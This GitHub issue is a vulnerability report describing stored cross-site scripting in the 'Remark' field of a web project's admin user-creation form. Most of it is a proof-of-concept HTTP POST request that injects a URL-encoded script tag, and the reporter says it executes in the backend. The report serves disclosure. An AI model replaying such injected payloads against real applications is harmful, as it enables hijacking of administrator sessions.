Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add users in the background - there is xss in the remarks #8

Open
nolan124 opened this issue Jan 8, 2023 · 0 comments
Open

Add users in the background - there is xss in the remarks #8

nolan124 opened this issue Jan 8, 2023 · 0 comments

Comments

@nolan124
Copy link

nolan124 commented Jan 8, 2023

Add users in the background - there is xss in the remarks
poc
`
POST /Manager/AddOrModify/ HTTP/1.1
Host: 192.168.3.129:10027
Content-Length: 141
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-CSRF-TOKEN-yilezhu: CfDJ8HxjCh0oOylDk40Utlg0kuVkHkyELbXkZ591U7-GfIexTnaoBJzXqAaXjoA5H3C6gvRNVVZEsvzH4kjo2ex7nqwNN0zp9AjetYdYquuFK7OiIvPLuLCjm4sSuQ-tFZQWY7sawRxuxp0hXS1vl2F2fEbDNZqWAkZswhhRnETzIfgvA0L2c1wlwu8Hd9iZzyK69g
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:10027
Referer: http://192.168.3.129:10027/Manager/AddOrModify/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuW5c6KKu3Hv3_AeZn_Eqz8FiekY-PyIkH57GfSaUX3CuNVAmpSx5KYdBHFWTuuZ-4BQgxoxIX-oBg8oGsWBgJqNKg-5d6xyMsDYpqosZkkNHB18dkAC6C5lh94kPv7Wq3aWf-jFp_ZA5K71nfIvbrHehMSum9bKmVeg44omCGGAfG0YgEYBwT4gQIM-DpQ8ihzLTAJ_CQVOQdWa3FUhulnMO80mKlyNt315-by3Bu-JaP9xkCYxJuuIpqUP8BQbZ19jfrISdQWgPMpbdvHRhmEbzjX8Ch5Y8dVgNgZiyL2S6mNtmuszsosdCdJ39sThpNbVwOvZ-giceXwRRzHBSvj9JlLkxIRQliWExonSpQRZTGt0aSyGXuLEIplNn7cEvwuxOLb_MWsD5qSqhRm30XW5QYXB_kikRurj2XX18q4PN7ISmAyxutiFGyQVY9HbBEqQG92SPxPXP5-8ug6DAc7994R-XPDTkQTU9FTBG9O_6ddLFFqDVZpf6CS3byZDAkRL9N5-k7soot2QEDCiqGqz
Connection: close

Id=&UserName=123aaaa&RoleId=1&NickName=12323a&Mobile=13322133321&Email=1%40xx.com&IsLock=false&Remark=%3Cscript%3Ealert(11111)%3C%2Fscript%3E
`
image

then in background exploit xss success
image

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant